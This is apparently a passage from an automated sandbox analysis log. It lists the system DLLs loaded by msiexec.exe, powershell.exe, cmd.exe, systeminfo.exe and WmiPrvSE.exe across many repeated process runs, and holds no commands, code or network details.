Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
